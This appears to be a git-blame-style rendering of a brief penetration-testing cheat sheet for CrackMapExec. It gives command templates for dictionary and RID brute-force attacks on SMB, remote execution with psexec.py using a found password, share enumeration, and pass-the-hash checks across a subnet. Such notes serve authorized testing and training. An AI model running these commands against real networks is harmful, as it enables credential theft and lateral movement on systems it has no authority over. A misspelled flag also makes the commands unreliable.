2022-11-11 01:15:07 +01:00
|
|
|
# Crackmapexec
|
|
|
|
|
2024-01-11 05:40:49 +01:00
|
|
|
## Dictionary attack against SMB
|
|
|
|
|
|
|
|
```sh
|
|
|
|
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
|
|
|
|
```
|
|
|
|
|
|
|
|
## Brute Force attack against SMB
|
|
|
|
|
|
|
|
Brute force attack using an anonymous user
|
|
|
|
|
|
|
|
```sh
|
|
|
|
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
|
2022-11-11 01:15:07 +01:00
|
|
|
```
|
2024-01-11 05:40:49 +01:00
|
|
|
|
|
|
|
## Use Found Password
|
|
|
|
|
|
|
|
Use the password with `impacket/examples/psexec.py` in the following way
|
|
|
|
|
2022-11-11 01:15:07 +01:00
|
|
|
```sh
|
|
|
|
psexec.py domain.name/<user>:<password>@<target-IP>
|
|
|
|
```
|
|
|
|
|
2024-01-11 05:40:49 +01:00
|
|
|
## Enumerate Shares
|
|
|
|
|
|
|
|
Check user permissions on shares
|
2022-11-11 01:15:07 +01:00
|
|
|
|
2024-01-11 05:40:49 +01:00
|
|
|
```sh
|
2022-11-11 01:15:07 +01:00
|
|
|
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
|
|
|
|
```
|
|
|
|
|
|
|
|
## SMB
|
2024-01-11 05:40:49 +01:00
|
|
|
|
|
|
|
Check user hash on the network via smb
|
|
|
|
|
2022-11-11 01:15:07 +01:00
|
|
|
```sh
|
|
|
|
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
|
|
|
|
```
|
|
|
|
|
|
|
|
|